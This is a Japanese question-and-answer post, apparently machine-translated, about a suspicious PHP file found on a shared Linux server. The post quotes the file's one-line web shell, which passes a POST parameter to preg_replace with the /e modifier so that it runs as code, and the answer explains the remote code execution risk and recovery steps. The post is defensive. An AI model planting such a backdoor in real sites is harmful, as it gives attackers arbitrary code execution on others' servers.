誰かが私たちが共有LinuxサーバーでホストされているアプリケーションにPHPファイルをアップロードしたことを発見しました。6fbb2.phpファイルの内容は次のとおりです。
EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
このファイルの目的は何ですか?私は何をすべきですか?
答え1
この文書の目的は次のとおりです。誰かにランダムなコードを実行させるあなたのサーバーからHTTP経由。
あなたがしなければならないのは、サイトへのアクセスをすぐに終了し、可能であれば残りのサーバーから復元できる検証可能なバックアップを探して、すべてを非常に慎重にチェックして、彼らが何をしたか、何をしたかを調べることです。まず、問題を再度有効にする前に問題を解決できます。
また見なさい:感染したサーバーを処理する方法は?セキュリティSEについて